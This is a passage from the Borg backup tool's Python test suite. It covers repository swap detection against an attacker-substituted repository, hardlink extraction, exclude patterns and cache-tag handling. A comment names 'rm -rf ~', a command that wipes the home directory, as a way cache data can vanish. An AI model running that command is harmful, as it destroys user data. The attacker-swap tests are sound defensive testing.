self.cmd('create', self.repository_location + '_encrypted::test.2', 'input', exit_code=EXIT_ERROR)
else:
with pytest.raises(Cache.RepositoryAccessAborted):
self.cmd('create', self.repository_location + '_encrypted::test.2', 'input')
def test_repository_swap_detection_no_cache(self):
self.create_test_files()
os.environ['BORG_PASSPHRASE'] = 'passphrase'
self.cmd('init', '--encryption=repokey', self.repository_location)
repository_id = self._extract_repository_id(self.repository_path)
self.cmd('create', self.repository_location + '::test', 'input')
shutil.rmtree(self.repository_path)
self.cmd('init', '--encryption=none', self.repository_location)
self._set_repository_id(self.repository_path, repository_id)
self.assert_equal(repository_id, self._extract_repository_id(self.repository_path))
self.cmd('delete', '--cache-only', self.repository_location)
if self.FORK_DEFAULT:
self.cmd('create', self.repository_location + '::test.2', 'input', exit_code=EXIT_ERROR)
else:
with pytest.raises(Cache.EncryptionMethodMismatch):
self.cmd('create', self.repository_location + '::test.2', 'input')
def test_repository_swap_detection2_no_cache(self):
self.create_test_files()
self.cmd('init', '--encryption=none', self.repository_location + '_unencrypted')
os.environ['BORG_PASSPHRASE'] = 'passphrase'
self.cmd('init', '--encryption=repokey', self.repository_location + '_encrypted')
self.cmd('create', self.repository_location + '_encrypted::test', 'input')
self.cmd('delete', '--cache-only', self.repository_location + '_unencrypted')
self.cmd('delete', '--cache-only', self.repository_location + '_encrypted')
shutil.rmtree(self.repository_path + '_encrypted')
os.rename(self.repository_path + '_unencrypted', self.repository_path + '_encrypted')
if self.FORK_DEFAULT:
self.cmd('create', self.repository_location + '_encrypted::test.2', 'input', exit_code=EXIT_ERROR)
else:
with pytest.raises(Cache.RepositoryAccessAborted):
self.cmd('create', self.repository_location + '_encrypted::test.2', 'input')
def test_repository_swap_detection_repokey_blank_passphrase(self):
# Check that a repokey repo with a blank passphrase is considered like a plaintext repo.
self.create_test_files()
# User initializes her repository with her passphrase
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
# Attacker replaces it with her own repository, which is encrypted but has no passphrase set
shutil.rmtree(self.repository_path)
with environment_variable(BORG_PASSPHRASE=''):
self.cmd('init', '--encryption=repokey', self.repository_location)
# Delete cache & security database, AKA switch to user perspective
self.cmd('delete', '--cache-only', self.repository_location)
repository_id = bin_to_hex(self._extract_repository_id(self.repository_path))
shutil.rmtree(get_security_dir(repository_id))
with environment_variable(BORG_PASSPHRASE=None):
# This is the part were the user would be tricked, e.g. she assumes that BORG_PASSPHRASE
# is set, while it isn't. Previously this raised no warning,
# since the repository is, technically, encrypted.
if self.FORK_DEFAULT:
self.cmd('create', self.repository_location + '::test.2', 'input', exit_code=EXIT_ERROR)
else:
with pytest.raises(Cache.CacheInitAbortedError):
self.cmd('create', self.repository_location + '::test.2', 'input')
def test_repository_move(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
repository_id = bin_to_hex(self._extract_repository_id(self.repository_path))
os.rename(self.repository_path, self.repository_path + '_new')
with environment_variable(BORG_RELOCATED_REPO_ACCESS_IS_OK='yes'):
self.cmd('info', self.repository_location + '_new')
security_dir = get_security_dir(repository_id)
with open(os.path.join(security_dir, 'location')) as fd:
location = fd.read()
assert location == Location(self.repository_location + '_new').canonical_path()
# Needs no confirmation anymore
self.cmd('info', self.repository_location + '_new')
shutil.rmtree(self.cache_path)
self.cmd('info', self.repository_location + '_new')
shutil.rmtree(security_dir)
self.cmd('info', self.repository_location + '_new')
for file in ('location', 'key-type', 'manifest-timestamp'):
assert os.path.exists(os.path.join(security_dir, file))
def test_security_dir_compat(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
repository_id = bin_to_hex(self._extract_repository_id(self.repository_path))
security_dir = get_security_dir(repository_id)
with open(os.path.join(security_dir, 'location'), 'w') as fd:
fd.write('something outdated')
# This is fine, because the cache still has the correct information. security_dir and cache can disagree
# if older versions are used to confirm a renamed repository.
self.cmd('info', self.repository_location)
def test_unknown_unencrypted(self):
self.cmd('init', '--encryption=none', self.repository_location)
repository_id = bin_to_hex(self._extract_repository_id(self.repository_path))
security_dir = get_security_dir(repository_id)
# Ok: repository is known
self.cmd('info', self.repository_location)
# Ok: repository is still known (through security_dir)
shutil.rmtree(self.cache_path)
self.cmd('info', self.repository_location)
# Needs confirmation: cache and security dir both gone (eg. another host or rm -rf ~)
shutil.rmtree(self.cache_path)
shutil.rmtree(security_dir)
if self.FORK_DEFAULT:
self.cmd('info', self.repository_location, exit_code=EXIT_ERROR)
else:
with pytest.raises(Cache.CacheInitAbortedError):
self.cmd('info', self.repository_location)
with environment_variable(BORG_UNKNOWN_UNENCRYPTED_REPO_ACCESS_IS_OK='yes'):
self.cmd('info', self.repository_location)
def test_strip_components(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('dir/file')
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test', '--strip-components', '3')
self.assert_true(not os.path.exists('file'))
with self.assert_creates_file('file'):
self.cmd('extract', self.repository_location + '::test', '--strip-components', '2')
with self.assert_creates_file('dir/file'):
self.cmd('extract', self.repository_location + '::test', '--strip-components', '1')
with self.assert_creates_file('input/dir/file'):
self.cmd('extract', self.repository_location + '::test', '--strip-components', '0')
def _extract_hardlinks_setup(self):
os.mkdir(os.path.join(self.input_path, 'dir1'))
os.mkdir(os.path.join(self.input_path, 'dir1/subdir'))
self.create_regular_file('source', contents=b'123456')
os.link(os.path.join(self.input_path, 'source'),
os.path.join(self.input_path, 'abba'))
os.link(os.path.join(self.input_path, 'source'),
os.path.join(self.input_path, 'dir1/hardlink'))
os.link(os.path.join(self.input_path, 'source'),
os.path.join(self.input_path, 'dir1/subdir/hardlink'))
self.create_regular_file('dir1/source2')
os.link(os.path.join(self.input_path, 'dir1/source2'),
os.path.join(self.input_path, 'dir1/aaaa'))
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
@requires_hardlinks
@unittest.skipUnless(llfuse, 'llfuse not installed')
def test_fuse_mount_hardlinks(self):
self._extract_hardlinks_setup()
mountpoint = os.path.join(self.tmpdir, 'mountpoint')
# we need to get rid of permissions checking because fakeroot causes issues with it.
# On all platforms, borg defaults to "default_permissions" and we need to get rid of it via "ignore_permissions".
# On macOS (darwin), we additionally need "defer_permissions" to switch off the checks in osxfuse.
if sys.platform == 'darwin':
ignore_perms = ['-o', 'ignore_permissions,defer_permissions']
else:
ignore_perms = ['-o', 'ignore_permissions']
with self.fuse_mount(self.repository_location + '::test', mountpoint, '--strip-components=2', *ignore_perms), \
changedir(mountpoint):
assert os.stat('hardlink').st_nlink == 2
assert os.stat('subdir/hardlink').st_nlink == 2
assert open('subdir/hardlink', 'rb').read() == b'123456'
assert os.stat('aaaa').st_nlink == 2
assert os.stat('source2').st_nlink == 2
with self.fuse_mount(self.repository_location + '::test', mountpoint, 'input/dir1', *ignore_perms), \
changedir(mountpoint):
assert os.stat('input/dir1/hardlink').st_nlink == 2
assert os.stat('input/dir1/subdir/hardlink').st_nlink == 2
assert open('input/dir1/subdir/hardlink', 'rb').read() == b'123456'
assert os.stat('input/dir1/aaaa').st_nlink == 2
assert os.stat('input/dir1/source2').st_nlink == 2
with self.fuse_mount(self.repository_location + '::test', mountpoint, *ignore_perms), \
changedir(mountpoint):
assert os.stat('input/source').st_nlink == 4
assert os.stat('input/abba').st_nlink == 4
assert os.stat('input/dir1/hardlink').st_nlink == 4
assert os.stat('input/dir1/subdir/hardlink').st_nlink == 4
assert open('input/dir1/subdir/hardlink', 'rb').read() == b'123456'
@requires_hardlinks
def test_extract_hardlinks1(self):
self._extract_hardlinks_setup()
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
assert os.stat('input/source').st_nlink == 4
assert os.stat('input/abba').st_nlink == 4
assert os.stat('input/dir1/hardlink').st_nlink == 4
assert os.stat('input/dir1/subdir/hardlink').st_nlink == 4
assert open('input/dir1/subdir/hardlink', 'rb').read() == b'123456'
@requires_hardlinks
def test_extract_hardlinks2(self):
self._extract_hardlinks_setup()
with changedir('output'):
self.cmd('extract', self.repository_location + '::test', '--strip-components', '2')
assert os.stat('hardlink').st_nlink == 2
assert os.stat('subdir/hardlink').st_nlink == 2
assert open('subdir/hardlink', 'rb').read() == b'123456'
assert os.stat('aaaa').st_nlink == 2
assert os.stat('source2').st_nlink == 2
with changedir('output'):
self.cmd('extract', self.repository_location + '::test', 'input/dir1')
assert os.stat('input/dir1/hardlink').st_nlink == 2
assert os.stat('input/dir1/subdir/hardlink').st_nlink == 2
assert open('input/dir1/subdir/hardlink', 'rb').read() == b'123456'
assert os.stat('input/dir1/aaaa').st_nlink == 2
assert os.stat('input/dir1/source2').st_nlink == 2
@requires_hardlinks
def test_extract_hardlinks_twice(self):
# setup for #5603
path_a = os.path.join(self.input_path, 'a')
path_b = os.path.join(self.input_path, 'b')
os.mkdir(path_a)
os.mkdir(path_b)
hl_a = os.path.join(path_a, 'hardlink')
hl_b = os.path.join(path_b, 'hardlink')
self.create_regular_file(hl_a, contents=b'123456')
os.link(hl_a, hl_b)
self.cmd('init', '--encryption=none', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input', 'input') # give input twice!
# now test extraction
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
# if issue #5603 happens, extraction gives rc == 1 (triggering AssertionError) and warnings like:
# input/a/hardlink: link: [Errno 2] No such file or directory: 'input/a/hardlink' -> 'input/a/hardlink'
# input/b/hardlink: link: [Errno 2] No such file or directory: 'input/a/hardlink' -> 'input/b/hardlink'
# otherwise, when fixed, the hardlinks should be there and have a link count of 2
assert os.stat('input/a/hardlink').st_nlink == 2
assert os.stat('input/b/hardlink').st_nlink == 2
def test_extract_include_exclude(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('file2', size=1024 * 80)
self.create_regular_file('file3', size=1024 * 80)
self.create_regular_file('file4', size=1024 * 80)
self.cmd('create', '--exclude=input/file4', self.repository_location + '::test', 'input')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test', 'input/file1', )
self.assert_equal(sorted(os.listdir('output/input')), ['file1'])
with changedir('output'):
self.cmd('extract', '--exclude=input/file2', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file3'])
with changedir('output'):
self.cmd('extract', '--exclude-from=' + self.exclude_file_path, self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file3'])
def test_extract_include_exclude_regex(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('file2', size=1024 * 80)
self.create_regular_file('file3', size=1024 * 80)
self.create_regular_file('file4', size=1024 * 80)
self.create_regular_file('file333', size=1024 * 80)
# Create with regular expression exclusion for file4
self.cmd('create', '--exclude=re:input/file4$', self.repository_location + '::test', 'input')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file2', 'file3', 'file333'])
shutil.rmtree('output/input')
# Extract with regular expression exclusion
with changedir('output'):
self.cmd('extract', '--exclude=re:file3+', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file2'])
shutil.rmtree('output/input')
# Combine --exclude with fnmatch and regular expression
with changedir('output'):
self.cmd('extract', '--exclude=input/file2', '--exclude=re:file[01]', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file3', 'file333'])
shutil.rmtree('output/input')
# Combine --exclude-from and regular expression exclusion
with changedir('output'):
self.cmd('extract', '--exclude-from=' + self.exclude_file_path, '--exclude=re:file1',
'--exclude=re:file(\\d)\\1\\1$', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file3'])
def test_extract_include_exclude_regex_from_file(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('file2', size=1024 * 80)
self.create_regular_file('file3', size=1024 * 80)
self.create_regular_file('file4', size=1024 * 80)
self.create_regular_file('file333', size=1024 * 80)
self.create_regular_file('aa:something', size=1024 * 80)
# Create while excluding using mixed pattern styles
with open(self.exclude_file_path, 'wb') as fd:
fd.write(b're:input/file4$\n')
fd.write(b'fm:*aa:*thing\n')
self.cmd('create', '--exclude-from=' + self.exclude_file_path, self.repository_location + '::test', 'input')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file2', 'file3', 'file333'])
shutil.rmtree('output/input')
# Exclude using regular expression
with open(self.exclude_file_path, 'wb') as fd:
fd.write(b're:file3+\n')
with changedir('output'):
self.cmd('extract', '--exclude-from=' + self.exclude_file_path, self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file2'])
shutil.rmtree('output/input')
# Mixed exclude pattern styles
with open(self.exclude_file_path, 'wb') as fd:
fd.write(b're:file(\\d)\\1\\1$\n')
fd.write(b'fm:nothingwillmatchthis\n')
fd.write(b'*/file1\n')
fd.write(b're:file2$\n')
with changedir('output'):
self.cmd('extract', '--exclude-from=' + self.exclude_file_path, self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file3'])
def test_extract_with_pattern(self):
self.cmd("init", '--encryption=repokey', self.repository_location)
self.create_regular_file("file1", size=1024 * 80)
self.create_regular_file("file2", size=1024 * 80)
self.create_regular_file("file3", size=1024 * 80)
self.create_regular_file("file4", size=1024 * 80)
self.create_regular_file("file333", size=1024 * 80)
self.cmd("create", self.repository_location + "::test", "input")
# Extract everything with regular expression
with changedir("output"):
self.cmd("extract", self.repository_location + "::test", "re:.*")
self.assert_equal(sorted(os.listdir("output/input")), ["file1", "file2", "file3", "file333", "file4"])
shutil.rmtree("output/input")
# Extract with pattern while also excluding files
with changedir("output"):
self.cmd("extract", "--exclude=re:file[34]$", self.repository_location + "::test", r"re:file\d$")
self.assert_equal(sorted(os.listdir("output/input")), ["file1", "file2"])
shutil.rmtree("output/input")
# Combine --exclude with pattern for extraction
with changedir("output"):
self.cmd("extract", "--exclude=input/file1", self.repository_location + "::test", "re:file[12]$")
self.assert_equal(sorted(os.listdir("output/input")), ["file2"])
shutil.rmtree("output/input")
# Multiple pattern
with changedir("output"):
self.cmd("extract", self.repository_location + "::test", "fm:input/file1", "fm:*file33*", "input/file2")
self.assert_equal(sorted(os.listdir("output/input")), ["file1", "file2", "file333"])
def test_extract_list_output(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file', size=1024 * 80)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
output = self.cmd('extract', self.repository_location + '::test')
self.assert_not_in("input/file", output)
shutil.rmtree('output/input')
with changedir('output'):
output = self.cmd('extract', '--info', self.repository_location + '::test')
self.assert_not_in("input/file", output)
shutil.rmtree('output/input')
with changedir('output'):
output = self.cmd('extract', '--list', self.repository_location + '::test')
self.assert_in("input/file", output)
shutil.rmtree('output/input')
with changedir('output'):
output = self.cmd('extract', '--list', '--info', self.repository_location + '::test')
self.assert_in("input/file", output)
def test_extract_progress(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file', size=1024 * 80)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
output = self.cmd('extract', self.repository_location + '::test', '--progress')
assert 'Extracting:' in output
def _create_test_caches(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('cache1/%s' % CACHE_TAG_NAME,
contents=CACHE_TAG_CONTENTS + b' extra stuff')
self.create_regular_file('cache2/%s' % CACHE_TAG_NAME,
contents=b'invalid signature')
os.mkdir('input/cache3')
if are_hardlinks_supported():
os.link('input/cache1/%s' % CACHE_TAG_NAME, 'input/cache3/%s' % CACHE_TAG_NAME)
else:
self.create_regular_file('cache3/%s' % CACHE_TAG_NAME,
contents=CACHE_TAG_CONTENTS + b' extra stuff')
def test_create_stdin(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
input_data = b'\x00foo\n\nbar\n \n'
self.cmd('create', self.repository_location + '::test', '-', input=input_data)
item = json.loads(self.cmd('list', '--json-lines', self.repository_location + '::test'))
assert item['uid'] == 0
assert item['gid'] == 0
assert item['size'] == len(input_data)
assert item['path'] == 'stdin'
extracted_data = self.cmd('extract', '--stdout', self.repository_location + '::test', binary_output=True)
assert extracted_data == input_data
def test_create_content_from_command(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
input_data = 'some test content'
name = 'a/b/c'
self.cmd('create', '--stdin-name', name, '--content-from-command',
self.repository_location + '::test', '--', 'echo', input_data)
item = json.loads(self.cmd('list', '--json-lines', self.repository_location + '::test'))
assert item['uid'] == 0
assert item['gid'] == 0
assert item['size'] == len(input_data) + 1 # `echo` adds newline
assert item['path'] == name
extracted_data = self.cmd('extract', '--stdout', self.repository_location + '::test')
assert extracted_data == input_data + '\n'
def test_create_content_from_command_with_failed_command(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--content-from-command', self.repository_location + '::test',
'--', 'sh', '-c', 'exit 73;', exit_code=2)
assert output.endswith("Command 'sh' exited with status 73\n")
archive_list = json.loads(self.cmd('list', '--json', self.repository_location))
assert archive_list['archives'] == []
def test_create_content_from_command_missing_command(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--content-from-command', self.repository_location + '::test', exit_code=2)
assert output.endswith('No command given.\n')
def test_create_paths_from_stdin(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file("file1", size=1024 * 80)
self.create_regular_file("dir1/file2", size=1024 * 80)
self.create_regular_file("dir1/file3", size=1024 * 80)
self.create_regular_file("file4", size=1024 * 80)
input_data = b'input/file1\0input/dir1\0input/file4'
self.cmd('create', '--paths-from-stdin', '--paths-delimiter', '\\0',
self.repository_location + '::test', input=input_data)
archive_list = self.cmd('list', '--json-lines', self.repository_location + '::test')
paths = [json.loads(line)['path'] for line in archive_list.split('\n') if line]
assert paths == ['input/file1', 'input/dir1', 'input/file4']
def test_create_paths_from_command(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file("file1", size=1024 * 80)
self.create_regular_file("file2", size=1024 * 80)
self.create_regular_file("file3", size=1024 * 80)
self.create_regular_file("file4", size=1024 * 80)
input_data = 'input/file1\ninput/file2\ninput/file3'
self.cmd('create', '--paths-from-command',
self.repository_location + '::test', '--', 'echo', input_data)
archive_list = self.cmd('list', '--json-lines', self.repository_location + '::test')
paths = [json.loads(line)['path'] for line in archive_list.split('\n') if line]
assert paths == ['input/file1', 'input/file2', 'input/file3']
def test_create_paths_from_command_with_failed_command(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--paths-from-command', self.repository_location + '::test',
'--', 'sh', '-c', 'exit 73;', exit_code=2)
assert output.endswith("Command 'sh' exited with status 73\n")
archive_list = json.loads(self.cmd('list', '--json', self.repository_location))
assert archive_list['archives'] == []
def test_create_paths_from_command_missing_command(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--paths-from-command', self.repository_location + '::test', exit_code=2)
assert output.endswith('No command given.\n')
def test_create_without_root(self):
"""test create without a root"""
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', exit_code=2)
def test_create_pattern_root(self):
"""test create with only a root pattern"""
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('file2', size=1024 * 80)
output = self.cmd('create', '-v', '--list', '--pattern=R input', self.repository_location + '::test')
self.assert_in("A input/file1", output)
self.assert_in("A input/file2", output)
def test_create_pattern(self):
"""test file patterns during create"""
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('file2', size=1024 * 80)
self.create_regular_file('file_important', size=1024 * 80)
output = self.cmd('create', '-v', '--list',
'--pattern=+input/file_important', '--pattern=-input/file*',
self.repository_location + '::test', 'input')
self.assert_in("A input/file_important", output)
self.assert_in('x input/file1', output)
self.assert_in('x input/file2', output)
def test_create_pattern_file(self):
"""test file patterns during create"""
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('file2', size=1024 * 80)
self.create_regular_file('otherfile', size=1024 * 80)
self.create_regular_file('file_important', size=1024 * 80)
output = self.cmd('create', '-v', '--list',
'--pattern=-input/otherfile', '--patterns-from=' + self.patterns_file_path,
self.repository_location + '::test', 'input')
self.assert_in("A input/file_important", output)
self.assert_in('x input/file1', output)
self.assert_in('x input/file2', output)
self.assert_in('x input/otherfile', output)
def test_create_pattern_exclude_folder_but_recurse(self):
"""test when patterns exclude a parent folder, but include a child"""
self.patterns_file_path2 = os.path.join(self.tmpdir, 'patterns2')
with open(self.patterns_file_path2, 'wb') as fd:
fd.write(b'+ input/x/b\n- input/x*\n')
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('x/a/foo_a', size=1024 * 80)
self.create_regular_file('x/b/foo_b', size=1024 * 80)
self.create_regular_file('y/foo_y', size=1024 * 80)
output = self.cmd('create', '-v', '--list',
'--patterns-from=' + self.patterns_file_path2,
self.repository_location + '::test', 'input')
self.assert_in('x input/x/a/foo_a', output)
self.assert_in("A input/x/b/foo_b", output)
self.assert_in('A input/y/foo_y', output)
def test_create_pattern_exclude_folder_no_recurse(self):
"""test when patterns exclude a parent folder and, but include a child"""
self.patterns_file_path2 = os.path.join(self.tmpdir, 'patterns2')
with open(self.patterns_file_path2, 'wb') as fd:
fd.write(b'+ input/x/b\n! input/x*\n')
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('x/a/foo_a', size=1024 * 80)
self.create_regular_file('x/b/foo_b', size=1024 * 80)
self.create_regular_file('y/foo_y', size=1024 * 80)
output = self.cmd('create', '-v', '--list',
'--patterns-from=' + self.patterns_file_path2,
self.repository_location + '::test', 'input')
self.assert_not_in('input/x/a/foo_a', output)
self.assert_not_in('input/x/a', output)
self.assert_in('A input/y/foo_y', output)
def test_create_pattern_intermediate_folders_first(self):
"""test that intermediate folders appear first when patterns exclude a parent folder but include a child"""
self.patterns_file_path2 = os.path.join(self.tmpdir, 'patterns2')
with open(self.patterns_file_path2, 'wb') as fd:
fd.write(b'+ input/x/a\n+ input/x/b\n- input/x*\n')
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('x/a/foo_a', size=1024 * 80)
self.create_regular_file('x/b/foo_b', size=1024 * 80)
with changedir('input'):
self.cmd('create', '--patterns-from=' + self.patterns_file_path2,
self.repository_location + '::test', '.')
# list the archive and verify that the "intermediate" folders appear before
# their contents
out = self.cmd('list', '--format', '{type} {path}{NL}', self.repository_location + '::test')
out_list = out.splitlines()
self.assert_in('d x/a', out_list)
self.assert_in('d x/b', out_list)
assert out_list.index('d x/a') < out_list.index('- x/a/foo_a')
assert out_list.index('d x/b') < out_list.index('- x/b/foo_b')
def test_create_no_cache_sync(self):
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('delete', '--cache-only', self.repository_location)
create_json = json.loads(self.cmd('create', '--no-cache-sync', self.repository_location + '::test', 'input',
'--json', '--error')) # ignore experimental warning
info_json = json.loads(self.cmd('info', self.repository_location + '::test', '--json'))
create_stats = create_json['cache']['stats']
info_stats = info_json['cache']['stats']
assert create_stats == info_stats
self.cmd('delete', '--cache-only', self.repository_location)
self.cmd('create', '--no-cache-sync', self.repository_location + '::test2', 'input')
self.cmd('info', self.repository_location)
self.cmd('check', self.repository_location)
def test_extract_pattern_opt(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('file2', size=1024 * 80)
self.create_regular_file('file_important', size=1024 * 80)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
self.cmd('extract',
'--pattern=+input/file_important', '--pattern=-input/file*',
self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file_important'])
def _assert_test_caches(self):
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['cache2', 'file1'])
self.assert_equal(sorted(os.listdir('output/input/cache2')), [CACHE_TAG_NAME])
def test_exclude_caches(self):
self._create_test_caches()
self.cmd('create', '--exclude-caches', self.repository_location + '::test', 'input')
self._assert_test_caches()
def test_recreate_exclude_caches(self):
self._create_test_caches()
self.cmd('create', self.repository_location + '::test', 'input')
self.cmd('recreate', '--exclude-caches', self.repository_location + '::test')
self._assert_test_caches()
def _create_test_tagged(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('tagged1/.NOBACKUP')
self.create_regular_file('tagged2/00-NOBACKUP')
self.create_regular_file('tagged3/.NOBACKUP/file2', size=1024)
def _assert_test_tagged(self):
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file1'])
def test_exclude_tagged(self):
self._create_test_tagged()
self.cmd('create', '--exclude-if-present', '.NOBACKUP', '--exclude-if-present', '00-NOBACKUP', self.repository_location + '::test', 'input')
self._assert_test_tagged()
def test_recreate_exclude_tagged(self):
self._create_test_tagged()
self.cmd('create', self.repository_location + '::test', 'input')
self.cmd('recreate', '--exclude-if-present', '.NOBACKUP', '--exclude-if-present', '00-NOBACKUP',
self.repository_location + '::test')
self._assert_test_tagged()
def _create_test_keep_tagged(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file0', size=1024)
self.create_regular_file('tagged1/.NOBACKUP1')
self.create_regular_file('tagged1/file1', size=1024)
self.create_regular_file('tagged2/.NOBACKUP2/subfile1', size=1024)
self.create_regular_file('tagged2/file2', size=1024)
self.create_regular_file('tagged3/%s' % CACHE_TAG_NAME,
contents=CACHE_TAG_CONTENTS + b' extra stuff')
self.create_regular_file('tagged3/file3', size=1024)
self.create_regular_file('taggedall/.NOBACKUP1')
self.create_regular_file('taggedall/.NOBACKUP2/subfile1', size=1024)
self.create_regular_file('taggedall/%s' % CACHE_TAG_NAME,
contents=CACHE_TAG_CONTENTS + b' extra stuff')
self.create_regular_file('taggedall/file4', size=1024)
def _assert_test_keep_tagged(self):
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file0', 'tagged1', 'tagged2', 'tagged3', 'taggedall'])
self.assert_equal(os.listdir('output/input/tagged1'), ['.NOBACKUP1'])
self.assert_equal(os.listdir('output/input/tagged2'), ['.NOBACKUP2'])
self.assert_equal(os.listdir('output/input/tagged3'), [CACHE_TAG_NAME])
self.assert_equal(sorted(os.listdir('output/input/taggedall')),
['.NOBACKUP1', '.NOBACKUP2', CACHE_TAG_NAME, ])
def test_exclude_keep_tagged(self):
self._create_test_keep_tagged()
self.cmd('create', '--exclude-if-present', '.NOBACKUP1', '--exclude-if-present', '.NOBACKUP2',
'--exclude-caches', '--keep-exclude-tags', self.repository_location + '::test', 'input')
self._assert_test_keep_tagged()
def test_recreate_exclude_keep_tagged(self):
self._create_test_keep_tagged()
self.cmd('create', self.repository_location + '::test', 'input')
self.cmd('recreate', '--exclude-if-present', '.NOBACKUP1', '--exclude-if-present', '.NOBACKUP2',
'--exclude-caches', '--keep-exclude-tags', self.repository_location + '::test')
self._assert_test_keep_tagged()
@pytest.mark.skipif(not are_hardlinks_supported(), reason='hardlinks not supported')
def test_recreate_hardlinked_tags(self): # test for issue #4911
self.cmd('init', '--encryption=none', self.repository_location)
self.create_regular_file('file1', contents=CACHE_TAG_CONTENTS) # "wrong" filename, but correct tag contents
os.mkdir(os.path.join(self.input_path, 'subdir')) # to make sure the tag is encountered *after* file1
os.link(os.path.join(self.input_path, 'file1'),
os.path.join(self.input_path, 'subdir', CACHE_TAG_NAME)) # correct tag name, hardlink to file1
self.cmd('create', self.repository_location + '::test', 'input')
# in the "test" archive, we now have, in this order:
# - a regular file item for "file1"
# - a hardlink item for "CACHEDIR.TAG" referring back to file1 for its contents
self.cmd('recreate', '--exclude-caches', '--keep-exclude-tags', self.repository_location + '::test')
# if issue #4911 is present, the recreate will crash with a KeyError for "input/file1"
@pytest.mark.skipif(not xattr.XATTR_FAKEROOT, reason='Linux capabilities test, requires fakeroot >= 1.20.2')
def test_extract_capabilities(self):
fchown = os.fchown
# We need to manually patch chown to get the behaviour Linux has, since fakeroot does not
# accurately model the interaction of chown(2) and Linux capabilities, i.e. it does not remove them.
def patched_fchown(fd, uid, gid):
xattr.setxattr(fd, b'security.capability', b'', follow_symlinks=False)
fchown(fd, uid, gid)
# The capability descriptor used here is valid and taken from a /usr/bin/ping
capabilities = b'\x01\x00\x00\x02\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
self.create_regular_file('file')
xattr.setxattr(b'input/file', b'security.capability', capabilities)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
with patch.object(os, 'fchown', patched_fchown):
self.cmd('extract', self.repository_location + '::test')
assert xattr.getxattr(b'input/file', b'security.capability') == capabilities
@pytest.mark.skipif(not xattr.XATTR_FAKEROOT, reason='xattr not supported on this system or on this version of'
'fakeroot')
def test_extract_xattrs_errors(self):
def patched_setxattr_E2BIG(*args, **kwargs):
raise OSError(errno.E2BIG, 'E2BIG')
def patched_setxattr_ENOTSUP(*args, **kwargs):
raise OSError(errno.ENOTSUP, 'ENOTSUP')
def patched_setxattr_EACCES(*args, **kwargs):
raise OSError(errno.EACCES, 'EACCES')
self.create_regular_file('file')
